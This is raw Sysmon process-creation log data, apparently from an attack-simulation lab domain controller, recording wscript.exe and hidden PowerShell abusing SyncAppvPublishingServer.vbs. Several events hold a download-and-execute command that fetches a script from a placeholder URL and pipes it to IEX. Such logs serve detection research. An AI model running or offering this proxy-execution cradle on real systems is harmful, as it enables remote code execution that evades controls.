154100x800000000000000025937127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:03.973{D271FDA4-EA47-6331-9AE9-020000007402}6792C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX}C:\Users\Administrator\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{D271FDA4-EA47-6331-99E9-020000007402}7856C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\system32\SyncAppvPublishingServer.vbs" "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
154100x800000000000000025936955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:07:03.875{D271FDA4-EA47-6331-99E9-020000007402}7856C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\system32\SyncAppvPublishingServer.vbs" "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"C:\Users\Administrator\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=95B2CC3A306C4C1059A53B660096F0A5,SHA256=8B2E206D1F6B510AD73C7541C03F39F9E4DDD7E3D1B9E31F3C8829C64B42E075{D271FDA4-6F52-6323-9002-010000007402}3848C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
154100x800000000000000025935924Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:06:59.817{D271FDA4-EA43-6331-96E9-020000007402}2904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX}C:\Users\Administrator\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{D271FDA4-EA43-6331-95E9-020000007402}4300C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\system32\SyncAppvPublishingServer.vbs" "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
154100x800000000000000025935624Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:06:59.715{D271FDA4-EA43-6331-95E9-020000007402}4300C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\system32\SyncAppvPublishingServer.vbs" "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"C:\Users\Administrator\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=95B2CC3A306C4C1059A53B660096F0A5,SHA256=8B2E206D1F6B510AD73C7541C03F39F9E4DDD7E3D1B9E31F3C8829C64B42E075{D271FDA4-800A-6323-D304-010000007402}7972C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe"